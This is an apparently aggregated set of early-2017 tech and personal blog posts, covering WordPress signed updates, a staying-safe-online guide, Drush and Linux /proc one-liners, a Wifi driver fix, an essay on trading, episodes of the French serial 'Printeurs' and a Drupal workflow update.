  • when applying var sets to groups, define a weight; when merging vars within the same subtree, look at a merge strategy; hash merges might need a weight too?
  • variable sets are defined in a group in some subtree, and can be overridden in groups from other trees

 

Overview in a nutshell:

(1) This is probably the point where service discovery becomes a better option

The post Ansible Inventory 2.0 design rules appeared first on Serge van Ginderachter.

The post WordPress to get secure, cryptographic updates appeared first on ma.ttias.be.

Exciting work is being done with regards to the WordPress auto-update system that allows the WordPress team to sign each update.

That signature can be verified by each WordPress installation to guarantee you're installing the actual WordPress update and not something from a compromised server.
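The underlying idea is plain detached-signature verification: releases are signed offline with a private key, and every installation ships the matching public key to check a download before applying it. The actual proposal builds on libsodium's signing primitives (via the sodium_compat package mentioned below); the commands here are only an illustration of that flow, using openssl and hypothetical file names rather than WordPress's real tooling:

$ openssl dgst -sha256 -sign release-signing.key -out wordpress-4.7.1.zip.sig wordpress-4.7.1.zip
$ openssl dgst -sha256 -verify release-signing.pub -signature wordpress-4.7.1.zip.sig wordpress-4.7.1.zip

If the archive was tampered with, or was signed with a different key, the second command fails and the update should be rejected.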

Compromising the WordPress Update Infrastructure

This work is being led by security researcher Scott Arciszewski from Paragon Initiative, a long-time voice in the PHP security community. He's been warning about the potential dangers of the WordPress update infrastructure for a very long time.

Scott and I discussed it in the SysCast podcast about Application Security too.

Since WordPress 3.7, support has been added to auto-update WordPress installations in case critical vulnerabilities are discovered. I praised them for that -- I really love that feature. It requires 0 effort from the website maintainer.

But that obviously poses a threat, as Scott explains:

Currently, if an attacker can compromise api.wordpress.org, they can issue a fake WordPress update and gain access to every WordPress install on the Internet that has automatic updating enabled. We're two minutes to midnight here (we were one minute to midnight before the Wordfence team found that vulnerability).

Given WordPress's ubiquity, an attacker with control of 27% of websites on the Internet is a grave threat to the security of the rest of the Internet. I don't know how much infrastructure could withstand that level of DDoS.
#39309: Secure WordPress Against Infrastructure Attacks

Scott has already published several security articles, with Guide to Automatic Security Updates For PHP Developers arguably being the most important one for anyone designing and creating a CMS.

Just about every CMS, from Drupal to WordPress to Joomla, uses a weak update mechanism: if an attacker manages to take control over the update server(s), there's no additional proof they need to have in order to issue new updates. This poses a real threat to the stability of the web.

Securing auto-updates

For WordPress, a federated authentication model is proposed.

It consists of 3 key areas, as Scott explains:

1. Notaries (WordPress blogs or other services that opt in to hosting/verifying the updates) will mirror a Merkle tree which contains (with timestamps and signatures):
--- Any new public keys
--- Any public key revocations
--- Cryptographic hashes of any core/extension updates

2. WordPress blogs will have a pool of notaries they trust explicitly. [...]

3. When an update is received from the server, after checking the signature against the WP core's public key, they will poll at least one trusted Notary [..]. The Notary will verify that the update exists and matches the checksum on file, and respond with a signed message containing:
--- The challenge nonce
--- The response timestamp
--- Whether or not the update was valid

This will be useful in the event that the WP.org's signing key is ever compromised by a sophisticated adversary: If they attempt to issue a silent, targeted update to a machine of interest, they cannot do so reliably [..].
#39309: Secure WordPress Against Infrastructure Attacks

This way, in order to compromise the update system, you need to trick the notaries too to accept the false update. It's no longer merely dependent on the update system itself, but uses a set of peers to validate each of those updates.

Show Me The Money Code

The first patches have already been proposed; it's now up to the WordPress security team to evaluate them and address any concerns they might have: patch1 and patch2.

Most of the work comes from a sodium_compat PHP package that implements the features provided by libsodium, a modern and easy-to-use crypto library.


Source: #39309

Because WordPress supports PHP 5.2.4 and higher (this is an entirely different security threat to WordPress, but let's ignore it for now), a pure PHP implementation of libsodium is needed since the PHP binary extensions aren't supported that far back. The pecl/libsodium extension requires at least PHP 5.4 or higher.

Here's hoping the patches get accepted and can be used soon, as I'm pretty sure there are a lot of parties interested in getting access to the WordPress update infrastructure.


January 15, 2017

If your non-geek partner and/or kids are joining you at FOSDEM, they may be interested in spending some time exploring Brussels while you attend the conference. As in previous years, FOSDEM is organising sightseeing tours.

January 14, 2017

Although I feel time has not been kind to Laurent Garnier's music (it sounds rather dated now, but it could just as well be me getting old), I do love listening to his "It is what it is" radio show on Radio Meuh, which he dutifully also uploads to his SoundCloud account. Garnier's musical taste, which he displays in his radio show, is so broad that in every show there's at least one song that I get all excited about. This time it's a solo improvisation by Bill Evans from back in 1958, titled "Peace Piece". So beautiful!

I published the following diary on isc.sans.org: “Backup Files Are Good but Can Be Evil“.

Since we started to work with computers, we always heard the following advice: "Make backups!". Every time you have to change something in a file or an application, first make a backup of the existing resources (code, configuration files, data). But, if not properly managed, backups can be evil and increase the attack surface of your web application… [Read more]

[The post [SANS ISC Diary] Backup Files Are Good but Can Be Evil has been first published on /dev/random]

January 13, 2017

One evening in August 2013, I started writing the beginning of a story that had been running through my head. It is always hard to say where ideas come from, but perhaps I had been evolving "Les non-humains", a pair of short stories written in 2009 and 2012 for which I had prepared a third instalment without ever finishing it.

The theme of my story was fairly clear and the title imposed itself immediately: Printeurs.

On the other hand, I had no plan and no structure. My only intention was to place the sentence that would close the second episode:

"I am poor, but I know how to think like a rich woman. I am going to change the system."

My challenge? Publish one episode a week and see where the story would take me.

One night in September 2013, after 5 published episodes, I found myself in a hotel in central Milan with no inspiration and no desire to continue.

My fingers spontaneously started writing another story that had been stammering away in my brain, a story directly inspired by the testimonies of survivors of North Korea's concentration camps and by the discovery that these prisoners produce toys and cheap goods that are being sold right now in the rest of the world.

With that very violent episode 6, Printeurs was transformed. From a harmless pulp cyberpunk serial, it became a dark, obscene plunge into the most repulsive side of our world.

The tone was set: Printeurs was not going to spare the reader's sensibilities.

Effortlessly, the two stories of Nellio and 689 continued in parallel while gradually converging.

As the writing went on, the character of Eva radically changed purpose. Everything fell into place without planning, without any conscious effort on my part.

Unfortunately, Printeurs was pushed into the background several times for long months. But a few die-hard readers did not hesitate to ask for more, and I would like to thank them: asking for the next episode is the finest reward you could give me.

In the end, it took me three and a half years to finish the 51 episodes of Printeurs and bring the wanderings of Nellio, Eva and 689 to a close. I admit to taking a certain pride in one unintentional quirk: within a single coherent story, Printeurs allows itself the luxury of exploring, almost exhaustively, every possible interaction between body, consciousness and technology.

Finishing Printeurs is also a relief. In November 2013, on top of Printeurs, I took on the NaNoWriMo challenge with the goal of writing the novel "L'Écume du temps".

The first 50,000 words of that novel were indeed written, but I never finished the rest, constantly torn between diving back into L'Écume du Temps or into Printeurs.

So I decided to send this first beta, unproofread version of Printeurs to everyone who supported my NaNoWriMo. With a solemn promise: from now on, I will dive back into L'Écume du Temps, which is very different and much more structured than Printeurs.

In the course of January, I will also send this first version of Printeurs in Epub format to those who support me on Tipeee. For everyone else, I invite you to read the series on this blog, in the Epub containing the first 19 episodes, or on Wattpad. The final episodes will be published on this blog progressively.

I hope you will have as much pleasure reading Printeurs as I had writing it. And if you have a publisher in your address book, know that I would be delighted to hold in my hands a paper version of what Printeurs has become and will become.

Thank you for your support, your corrections, your encouragement and… happy reading!

Photo by Eyesplash.

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or get in touch with me.

This text is published under the CC-By BE licence.

I published the following diary on isc.sans.org: “Who’s Attacking Me?“.

I started to play with a nice reconnaissance tool that could be helpful in many cases – offensive as well as defensive. “IVRE” (“DRUNK” in French) is a tool developed by the CEA, the Alternative Energies and Atomic Energy Commission in France. It’s a network reconnaissance framework that includes… [Read more]

[The post [SANS ISC Diary] Who’s Attacking Me? has been first published on /dev/random]

January 11, 2017

The post Staying Safe Online – A short guide for non-technical people appeared first on ma.ttias.be.

Help, my computer's acting up!

If you know a thing or two about computers, chances are you've got an uncle, aunt, niece or nephew that's asked for your help in fixing a computer problem. If the problem wasn't hardware related, it was most likely malware, a virus, ransomware or drive-by-installations of internet toolbars.

Instead of fixing the problems after the infections, let's do some preventive work: this is a guide to staying safe online, for non-technical people. This means it won't cover things like 2FA, because I think the problem is much more basic: how to keep your computer and information clean and safe.

The goal is to have this be a guide you can share with your relatives, resulting in them having a safer computer with fewer problems that need fixing. If you agree with these pointers, go ahead and share the link!

If you are said relative or friend: this won't take more than 30 minutes and you don't need to be a wizard IT guru to implement these fixes. Please, take your time and configure your computer, you'll be much safer because of it.

Enable auto-updates on all your devices

The number 1 problem with broken or infected computers is outdated software. Yes, an update can break your system, but you're much more likely to have a compromised computer because of a lack of updates than the other way around.

For all your devices, enable auto-updates. That means:

  • Your laptop, PC, Mac, ...
  • Your iPhone or Android device
  • Your iPad or Android tablet

Enabling auto updates usually isn't very hard. Go to your settings screen and find the Updates or Upgrades section. Mark the checkbox that says "Install updates automatically".

Don't reuse your passwords or PINs, use passphrases

But Mattias, I can't remember more than 5 different passwords!

Good. Neither can I! That's why I have tools that help me with that. Tools like 1 Password.

They work really simple:

  • You install the app and a browser extension (it's easier than it sounds, just click next, next & next in the installer)
  • You pick a strong, unique passphrase for your 1 Password master password
  • You let 1 Password generate a random, unique, password for your online accounts

Here's the reasoning: your password right now is probably something like "john1". You added the number 1 a few years ago, because some website insisted that you add a numerical value to your password.

Or you're at john17, because every few months work makes you change your password and you increment the number. But these passwords are insanely easy to guess, hack or brute force. Don't bother, you might as well not have a password.

There's a famous internet comic that explains this very well, but it's all very nerdy. The summary is: you're better off using passphrases instead of passwords.

After you've installed 1 Password, it will ask you for the master password of your password vault. Make it a sentence. Did you know you can use spaces in a password? And commas, exclamation marks and question marks? You could use "I followed Mattias his security advice!" as a password and it would be safe as hell. Spaces and exclamation mark included.

It's got so many characters, even the fastest computers in the world would take ages to guess.

Now, whenever you need to make a new account for a Photo printing service, an online birth list, your kids' high school, ... don't reuse your same old password, let 1 Password generate a password for you.

Next time you visit that website, you don't have to remember the password, 1 Password can tell you.

If you've reused your current password on Facebook, Gmail and all other websites, now would be a very good time to reset them all to something completely random, managed in your 1 Password.

Install an adblocker in your browser

First, you should be using either Google Chrome or Firefox. If you're using Internet Explorer, Edge, Safari or something else, you might want to switch. (Note: it's not just personal preference, Internet Explorer is much more likely to be the target of a hack and you need a browser that supports "extensions" to install an adblocker)

You'll want to block ads on the web not just because they're ugly, but because they can contain viruses and you're probably going to be browsing to websites that are using shady advertising partners that are up to no good.

Now that you're on Chrome or Firefox, install uBlock Origin, probably the best adblocker you can get today.

Once you have it installed, you should see a red badge icon appear in your browser: 

Don't bother with that little counter: as long as the icon is red, the plugin is active and blocking ads and other potential sources of malware for you.

If you have other adblockers, like Adblock Plus, go ahead and remove them. They slow your browser down and you don't need them if you have uBlock Origin.

Offsite Back-ups

Do you like the data on your computer? Those pictures of your grandchildren, the Excel sheets with your expenses and the biography you've been working on for years? Then you'll definitely care about keeping your data safe in case of a disaster.

Disasters can come in many forms: hardware failure, ransomware, a virus, theft, your house burns down, ...

If you copy your files to a USB disk once in a while: good for you. But it's not enough. You want to store your back-ups outside your home.

And it isn't as complex as it sounds. The only catch: it costs a bit of money. But trust me, your data is worth it if you ever need to restore the back-up.

My recommendation for an easy-to-use tool is Backblaze: it's 5$ per month, fixed price, for unlimited storage.

You install the tool (again: click next, next & next), it'll back up all the files on your computer and send them to the cloud, encrypted. If you ever need to restore anything, log in to your Backblaze account and download the files.

Remember, your back-up account contains all your valuable data, choose a strong passphrase for the account and save it in your 1 Password!

Odd emails from strangers or relatives

It's something we call phishing emails, where someone sends you an email, which looks very legitimate, and tries to fool you into browsing to a website that isn't real.

The most likely targets are: your banking website, electrical or phone bill websites, your facebook/gmail/... account page, ...

If you receive an e-mail and you're not sure what to do: reply and ask for clarification. If it's a spammer or someone trying to trick you, chances are they won't reply.

If they replied and you're still not convinced: forward to someone in IT you know, they'll happily say "yes" or "no" to determine the safety and validity of the email. In most cases, we can tell really quickly because we see them all the time.

About those porn sites ...

Yes, the P word. I have to go there.

If my history of fixing other people's computers has taught me one thing, it's this: if your PC is infected with a virus, it's probably because you visited a dirty website.

So let's make a deal and agree never to discuss this in public:

  • PornHub: Don't go to weird Fetish websites, stick to the popular and big ones like PornHub (trust me, they're famous)
  • Go private: When you browse them, use your browser's incognito mode to prevent cookies & your browser history from remembering what you did. You do this by clicking the 3 dots in the upper right corner and choosing New incognito window.
  • Adblocker: When you visit such a website, make sure you have uBlock Origin installed, the adblocker. Shady websites do shady things to make money.

And if a link looks shady: don't click on it. Please.

Want to go beyond these steps and optimally secure your computer? Check out DecentSecurity.com and follow their guides.


If you found these tips useful to you, please help me spread awareness by sharing this post on your social network (Facebook, Twitter, ...) using the buttons below this post.

Good luck!

The post Staying Safe Online – A short guide for non-technical people appeared first on ma.ttias.be.

The post A collection of Drupal Drush one liners and commands appeared first on ma.ttias.be.

Some quick one-liners that can come in handy when using drush, Drupal's command line interface.

Place all websites in Drupal maintenance mode

$ drush @sites vset site_offline 1

Place a specific multi-site website in maintenance mode

$ drush -l site_alias_name vset site_offline 1

Take all sites out of maintenance mode

$ drush @sites vset site_offline 0

Set the cache lifetime (600 seconds) and page cache maximum age (1800 seconds) for all sites

$ drush @sites vset cache_lifetime 600
$ drush @sites vset page_cache_maximum_age 1800

List all sites in a multi-site drupal setup

$ drush @sites status
You are about to execute 'status' non-interactively (--yes forced) on all of the following targets:
  /var/www/html/site#multisite_A
  /var/www/html/site#multisite_B
Continue?  (y/n):
...

Flush all caches (varnish, memcached, ...)

$ drush @sites cc all

Disable drupal's cron

$ drush @sites vset cron_safe_threshold 0
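
One more that is not from the original list, but tends to be useful in the same multi-site situations (assuming Drupal 7 with a reasonably recent drush, as in the examples above), is running any pending database updates on every site at once:

$ drush @sites updatedb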

If you know any more life-saving drush commands (you know the kind, the ones you need when all hell breaks loose and everything's offline), let me know!

The post A collection of Drupal Drush one liners and commands appeared first on ma.ttias.be.

The post Show the environment variables of a running process in Linux appeared first on ma.ttias.be.

A quick mental dump in case I forget it again next time. First, check your PID:

$ ps faux | grep 'your_process'
508      28818  0.0  0.3  44704  3584 ?        Sl   10:10   0:00  \_ /path/to/your/script.sh

Now, using that PID (in this case, 28818), check the environment variables in /proc/$PID/environ.

$ cat /proc/28818/environ
TERM=linuxPATH=/sbin:/usr/sbin:/bin:/usr/binrunlevel=3RUNLEVEL=3SUPERVISOR_GROUP_NAME=xxxPWD=/path/to/your/homedirLANGSH_SOURCED=1LANG=en_US.UTF-8previous=NPREVLEVEL=N

Now, to make that output more readable, replace the null characters (\0) with newlines (\n).

$ cat /proc/28818/environ | tr '\0' '\n'
TERM=linux
PATH=/sbin:/usr/sbin:/bin:/usr/bin
runlevel=3
RUNLEVEL=3
SUPERVISOR_GROUP_NAME=xxx
PWD=/path/to/your/homedir
LANGSH_SOURCED=1
LANG=en_US.UTF-8
previous=N
PREVLEVEL=N

Alternatively (but equally hard to read), you can add the e modifier to ps to also show all environment variables. I personally find /proc easier to interpret, since it only contains the environment variables.

$ ps e -ww -p 28818
  PID TTY      STAT   TIME COMMAND
28818 ?        Sl     0:00 /path/to/your/script.sh TERM=linux PATH=/sbin:/usr/sbin:/bin:/usr/bin runlevel=3 RUNLEVEL=3 SUPERVISOR_GROUP_NAME=xxx PWD=/var/www/vhosts/worker.nucleus.be/cron-tasks LANGSH_SOURCED=1 LANG=en_US.UTF-8 previous=N
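
A small variation on the tr trick above that also works, using nothing but standard tools (this assumes GNU xargs, whose default command is echo), is to let xargs split the file on the null bytes and print one variable per line:

$ xargs -0 -n1 < /proc/28818/environ

The output is the same one-variable-per-line list as the tr version produces.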

If you've got other tricks, I'd love to hear about them!

The post Show the environment variables of a running process in Linux appeared first on ma.ttias.be.

Like many people, you probably have a little money in a savings account. You grumble that interest rates are so low that it earns you nothing! You also think that traders are despicable cynics who make millions off your back, and that they are responsible for the crisis.

I was, in any case, like that myself not so long ago.

And I did not realize how riddled with contradictions those positions are.

Bitcoin and money

Passionate about decentralization, one day in 2010 I discovered the Bitcoin project, which was building a decentralized currency. The very principle of the project led me to discover the complex role banks play in the creation of money.

Naively, I thought banks lent out their savers' money. In reality, since a loan is nothing more than a sum written onto an account, banks can lend almost as much money as they want. They literally create money by lending. This creation is, however, regulated by law. In the end, banks must keep 1% of the money they lend in their vaults.

This means that if you put €1,000 into a savings account, you authorize the bank to create €100,000 in loans.

Banks therefore control money and, as a consequence, the world!

Trading

By buying bitcoins, rather clumsily, I also discovered trading. As the name suggests, trading consists solely of buying or selling an asset. As in any purchase, there is a seller and a buyer. Both are convinced they are getting a good deal.

A professional trader seeks to buy when he thinks the asset will gain value. He will sell when he thinks that, on the contrary, prices are about to fall.

Buying with the intention of reselling later is called speculation.

Seen that way, it is hard to find anything to object to. If two people want to make a commercial transaction of their own free will, that is perfectly honest.

And as soon as we have money we do not need immediately, we naturally speculate by "investing our money". Demanding an interest rate on our savings account is, at bottom, nothing but the most basic form of speculation.

So in what way is trading supposed to be so amoral?

Prices and market rates

One deep misunderstanding the general public has about trading concerns the fluctuation of prices. It is perceived as magical, directed by some kind of supreme power.

In reality, the price is only ever set by successive sales and purchases.

If I own a gold bar that I want to sell for €1,000 but nobody wants to buy it, I am probably asking too much. Likewise, if I cannot find a gold bar to buy at €500, it means I have to pay more.

The price is set as soon as two people reach an agreement.

If nobody wants to buy my gold bar anymore, I will lower the price further and further. Sometimes catastrophically. That is what we call a crash.

If, on the contrary, some reason pushes everyone to buy a gold bar but the supply is insufficient, the price will rise.

In theory, nobody interferes with prices. Supply and demand are the product of human emotions, and the price is merely their reflection. In that sense, trading is an attempt to understand the psychology of the human crowd.

The economic actors

In such a system of exchange, the people who make a profit only do so because others have made losses.

But it is important to note that those who lost took a risk, of their own free will, with the one and only goal of making a gain. They bought something they did not need, hoping to resell it.

On the stock markets, for example, the money in play comes from large companies, wealthy investors and banks.

So when a trader makes a fortune playing with his own money, he does it at the expense of large companies, wealthy investors and banks.

By comparison, most advertisers and marketers try to get ordinary, even poor, people to spend their money. While trading is probably not the most useful job for society, it seems to me, at bottom, far more moral than a whole array of other jobs that are nevertheless considered respectable.

Plot twist: trading may not be a fundamentally harmful activity after all!

The banks' money

While trading is a morally neutral tool, like any tool it can be misused.

Remember that with your €1,000, banks can create €100,000. The temptation is great to use those €100,000 to make even more profit through speculation.

And that is precisely the crux of the problem: banks can gamble a lot of money. The probability of making substantial gains is therefore enormous.

The overwhelming majority of those gains will go to the banks themselves, which is why the world of finance seems so disconnected from our own. A tiny share of the gains will nevertheless be passed back to you: the interest.

By demanding interest on your savings account, you encourage, indeed you require, the banks to gamble with your money.

If you are against trading, then make sure you leave any bank that offers an interest rate on your savings for one that, on the contrary, charges you for its services!

So everyone is happy with this little game. Until the day the banks lose.

At that moment, suddenly, the leverage that multiplied your €1,000 into €100,000 works in reverse. The banks run out of liquidity and go bankrupt.

With the exception of Iceland, most banks in that situation have been bailed out… by the state, and therefore with our tax money.

In short, banks are entities that pocket the profits made with our money and that we must bail out when they make losses!

The usefulness of trading

The traders I have met argue that trading is a useful activity that allows prices to find their natural value. Some financial instruments even allow producers of raw materials to insure themselves against, for example, a bad harvest.

Whatever you think of trading, it is hard to consider it immoral for two consenting people to carry out a commercial transaction.

Admittedly, one can argue that trading profits are potentially under-taxed compared to income from work, and that current laws favour the rich. But then it is not trading that should be criticized, it is the laws written by those we elected.

In the end, traders are merely trying to get rich at the expense of capitalists who are themselves seeking to get ever richer. Can we really blame them for that?

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum: blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE license.

We have just published the second set of interviews with our main track speakers. The following interviews give you a lot of interesting reading material about various topics: Benedict Gaster (cuberoo_): LoRaWAN for exploring the Internet of Things. Talk Hard: A technical, political, and cultural look at LoRaWAN for IoT Brooks Davis: Everything You Always Wanted to Know About "Hello, World"*. (*But Were Afraid To Ask) Daniel Stenberg: You know what's cool? Running on billions of devices. curl from A to Z Keith Packard: Free Software For The Machine Klaus Aehlig: Bazel. How to build at Google scale? Rich…

January 10, 2017

The Wifi connection of this machine is very slow, especially noticeable when logging in to the machine via ssh.
The solution is to follow the notes on https://wiki.debian.org/rtl819x , copied here:

Devices supported by this driver may suffer from intermittent connection loss. If so, it can be made more reliable by disabling power management via module options ips and fwlps. These can be supplied by creating a new file:
/etc/modprobe.d/rtl8192ce.conf:

options rtl8192ce ips=0 fwlps=0
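
As a purely illustrative way of applying this on a Debian system (assuming the rtl8192ce module is the one in use), something along these lines should create the file and reload the driver without a reboot; expect the Wifi connection to drop briefly while the module is reloaded:

$ echo 'options rtl8192ce ips=0 fwlps=0' | sudo tee /etc/modprobe.d/rtl8192ce.conf
$ sudo modprobe -r rtl8192ce && sudo modprobe rtl8192ce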


January 08, 2017

This is post 43 of 43 in the Printeurs series

After escaping an attack, Nellio, Eva, Junior and Max are in a police car speeding toward the headquarters of the industrial zone's conglomerate.

— Ah, there it is!

With his finger, Junior points at a long black line streaking the sky. The line is soon joined by a second and then a third, drawing a strange arabesque, the stylization of a narrow flower of shadow closing in on itself, thickening, undulating in an imperceptible, wire-thin saraband.

— The drones! Junior explains. Near the industrial zone, the air corridors are so congested that you can watch genuine drone traffic jams.

Dreamily, I contemplate the long black lines, strange chrysanthemums of shadow standing out against the greying uniformity. As we get closer, the individual drones become distinguishable; the line turns discontinuous, dotted.

— And to think that the politicians are proud of their intertube!

— Back when the intertube project was launched, drones did not yet have enough autonomy or lifting capacity. On top of that, drones cause problems in the airspace, not to mention the risks of interception and theft.

— All those problems have been solved, I say. But that is precisely the constant of the politician's trade: not seeing that the world evolves, that problems can be solved. Besides, what is a politician without a problem? A politician who cannot promise a solution and who therefore will not be re-elected. Politicians do not want the world to change. Neither do the voters. They promise change with a capital "C", the kind where everything stays the same. Deep down, they promise exactly what we want to hear.

— And yet, Junior interjects, if they kept investing in the intertube, there must be a reason.

— Oh yes, there is one! Not being the one who has to admit that the government made a mistake. Mistakes, generally, you are forced to acknowledge when they cost you money. And even then, people sometimes prefer to keep paying rather than admit they were wrong. But when it is not your own money you are spending, and admitting a mistake could cost you your job, there is absolutely no incentive to stop even the most catastrophic undertakings. Not to mention that the intertube worksite creates jobs. Thousands of workers digging useless holes under the city, toiling, wearing themselves out, spending their days underground doing completely useless work that could have been automated. All of that just to feel morally superior to a tele-pass. You want to know what I think? We blame the politicians, the rich, the industrialists and even the tele-passes for all our ills. But the ones truly responsible are those who do as they are told, who carry out useless work as conscientiously as possible for fear of losing the meagre benefits that come with it. Those people are responsible.

— And those people are us, Junior concludes.

— Yes. They are us. And we have no excuse.

— Maybe we had no choice…

— The only choice we do not have is the choice to be born. After that, every breath, every step is a choice. Choice is something you take, you wrest, you earn. But it is so much easier to convince ourselves that we have no choice, to settle comfortably into the rails that the infinity of non-choices has laid down for us. Choice: we refuse it, we flee from it like the plague. And one day we will pay the price of our thoughtlessness, of our irresponsibility.

— And yet being born is the only choice I have ever made.

Intrigued, I turn toward Eva, who has just interrupted me.

— What do you mean?

— Nellio…

— You can explain yourselves later, because we have arrived at the industrial conglomerate's complex.

Watching the road go by, I notice that we are approaching a security checkpoint. Two officers stand at attention behind the red line painted on the ground, where the car will have no choice but to stop. I swallow hard as I realize that we have no papers, no valid excuse for being in this district, and that we are wanted.

— Shit, the checkpoint. I had forgotten. Any miracle solution to get us out of this one?

As we draw closer to the line, a doubt creeps over me. The car does not seem to be slowing down. On the contrary, we are accelerating. In the eyes of the security officers I watch the same doubt suddenly turn into fear, then panic. They barely have time to dive out of the way, one to each side, as the car grazes past them at full speed.

— Huh? How is that possible? We got through the checkpoint without being stopped!

Junior gives me a wink in the rear-view mirror.

— That is the advantage of manual mode. It has become so rare, and so reserved for the security forces, that most roadblocks now rely solely on taking control of the driving software.

— But that means the slightest terrorist could…

— Yes. But they don't. Which goes to show that terrorists are far less trained and intelligent than we are led to believe. In fact, the purpose of a road checkpoint is not really to stop terrorists but to convince the citizens that the threat is real and that every measure is being taken.

— And I suppose that, as a bonus, it creates jobs…

— An enormous number of jobs. From grunts like our two valiant asphalt divers all the way up to the heads of the police stations.

— What a profoundly dishonest system! And to think that the people in charge of all this know it, and cynically laugh at us.

— Oh, no need to invoke dishonesty when incompetence will do. You know, Nellio, I have had occasion to rub shoulders with some very high-ranking officials. And all of them, without exception, are convinced of the legitimacy of their mission.

— But how do you explain such incompetence?

— First, because human beings have an incredible capacity not to see whatever might disturb their way of thinking. The fact that religions still exist today illustrates this amply. Second, because it is the very essence of the system! If people did their jobs well…

— …there would be no more jobs. It's logical! So the more incompetent you are, the more jobs you create, and the better you are perceived!

We are interrupted by Max, who in his soft, warm voice makes an announcement worthy of the finest transatlantic flights.

— Incompetence which reaches its peak and its full splendour here, ladies and gentlemen, at the headquarters of the industrial conglomerate, epicentre of job creation and of the concentration of wealth. Welcome!

Without being able to explain why, my heart tightens as I raise my eyes toward the tall building.

— So this is where everything will play out…

 

Photo by Jin Mikami.

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum: blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE license.

January 07, 2017

I published the following diary on isc.sans.org: “Using Security Tools to Compromize a Network“.

One of our daily tasks is to assess and improve the security of our customers or colleagues. To achieve this, we use security tools (linked to processes). Over time, we all build a personal toolbox of favourite tools. Yesterday, I read an interesting blog article about extracting saved credentials from a compromised Nessus system. [Read more]

[The post [SANS ISC Diary] Using Security Tools to Compromize a Network has been first published on /dev/random]

There is something that has been getting me incredibly worked up for a while now: firelighters.

There is a certain brand of firelighters that carries no ECO label (so their marketing people did not bother to ask the printer of the little cardboard box to squeeze "ECO" onto it). Those turn out to work really well. Because they presumably just contain petrol or something. So they work. Makes sense.

On top of that, there are an incredible number of other brands that do not work. You literally have to hold a flame to them for twenty to thirty seconds. As a result you need more lighter gas, you burn your fingers more often and you get your hands dirty on the stove more quickly. In other words, they do not work.

Things that do not work eventually stop selling well.

So now plenty of supermarkets carry a surplus of so-called ecological firelighters and a shortage of that good brand. The brand that actually works.

Now I wonder: those few milligrams of petrol, or whatever is in those good firelighters, is it really such a problem to burn that up when you put fifty litres of the stuff in your car's tank? I mean: one turn of the steering wheel in the supermarket car park and you have already used up a couple of years' worth of firelighter petrol.

I just needed to get that off my chest.

January 06, 2017

“Meeting with intel officials ‘constructive,’ hacking had ‘absolutely no effect’ on election. There was no tampering whatsoever with voting machines,” Trump said.

“There had been attempts to hack the Republican National Committee (RNC). However, thanks to the Committee’s strong hacking defenses, they all failed,” Trump said.

“America’s safety and security is a number one priority”, Trump said. He will appoint a team to draft plans on how to repel any cyber attacks on the US in the future. However, he added, “the methods, tools and tactics” of enforcing cyber security would not be made public. “That will benefit those who seek to do us harm,” Trump said.

The king is dead, long live the king.

This is a short summary of my 2016 reading experience, following my 2015 Year In Books.

Such Stats

I’ve read 38 books, most of which were novels, up from last year’s “44”, which included at least a dozen short stories. These totaled 10779 pages, up from 6xxx in both previous years.

Favorites FTW

Peter Watts

My favorites for 2016 are without a doubt Blindsight and Echopraxia by Peter Watts. I got to know Watts, who is now in my short list of favorite authors, through the short story Malek, which I mentioned in my 2015 year in books. I can’t describe the books in a way that does them sufficient justice, but suffice to say that they explore a good number of interesting questions and concepts. Exactly what you (or at least I) want from Hard (character) Science Fiction.

You can haz a video with Peter Watts reading a short excerpt from Echopraxia at the Canada Privacy Symposium. You can also get a feel from these books based on their quotes: Blindsight quotes, Echopraxia quotes. Or simply read Malek 🙂 Though Malek does not have OP space vampires that are seriously OP.

My favorite non-fiction book for the year is Thinking Fast and Slow, which is crammed full with information useful to anyone who wants to better understand how their (or others) mind works, where it tends to go off the rails, and what can be done about those cases. The number two slot goes to Domain-Driven Design Distilled, which unlike the red and blue books is actually somewhat readable.

My favorite short story was Crystal Nights by Greg Egan. It explores the creation of something akin to strong AI via simulated evolution, including various ethical and moral questions this raises. It does not start with a tetravalent graph more like diamond than graphite, but you can’t have everything now can you?

Dat Distribution

All books I read, except for 2 short stories, were published in the year 2000 or later.

Lying Lydia <3

Lydia after audiobook hax

For 2016 I set a reading goal of 21 books, to beat Lydia’s 20. She ended up reading 44, so she beat me. However, she used OP audio book hax. I attempted this as well but did not manage to catch up, even though I racked up 11.5 days worth of listening time. This year I will win of course. (Plan B)

Series, Seriously

As you might be able to deduce from the read in vs published in chart, I went through a number of series. I read all The Expanse novels after watching the first season of the television series based on them. Similarly I read the Old Man’s War novels except the last one, which I have not finished yet. Both series are fun, though they might not live up to the expectations of fellow Hard Science Fiction master race members, as they are geared more towards plain SF plebs. Finally I started with the Revelation Space books by Alastair Reynolds after reading House of Suns, which has been on my reading list since forever. This was also high time since clearly I need to have read all the books from authors that have been in a Google hangout with Special Circumstances agent Iain M. Banks.

Nine months ago I wrote about the importance of improving Drupal's content workflow capabilities and how we set out to include a common base layer of workflow-related functionality in Drupal 8 core. That base layer would act as the foundation on which we can build a list of great features like cross-site content staging, content branching, site previews, offline browsing and publishing, content recovery and audit logs. Some of these features are really impactful; 5 out of the top 10 most requested features for content authors are related to workflows (features 3-7 on the image below). We will deliver feature requests 3 and 4 as part of the "content workflow initiative" for Drupal 8. Feature requests 5, 6 and 7 are not in scope of the current content workflow initiative but still stand to benefit significantly from it. Today, I'd like to provide an update on the workflow initiative's progress the past 9 months.

The top 10 requested features for content creators according to the 2016 State of Drupal survey. Features 1 and 2 are part of the media initiative for Drupal 8. Features 3 and 4 are part of the content workflow initiative. Features 5, 6 and 7 benefit from the content workflow initiative.

Configurable content workflow states in Drupal 8.2

While Drupal 8.0 and 8.1 shipped with just two workflow states (Published and Unpublished), Drupal 8.2 (with the experimental Content moderation module) ships with three: Published, Draft, and Archived. Rather than a single 'Unpublished' workflow state, content creators will be able to distinguish between posts to be published later (drafts) and posts that were published before (archived posts).

The 'Draft' workflow state is a long-requested usability improvement, but may seem like a small change. What is more exciting is that the list of workflow states is fully configurable: you can add additional workflow states, or replace them with completely different ones. The three workflow states in Drupal 8.2 are just what we decided to be good defaults.

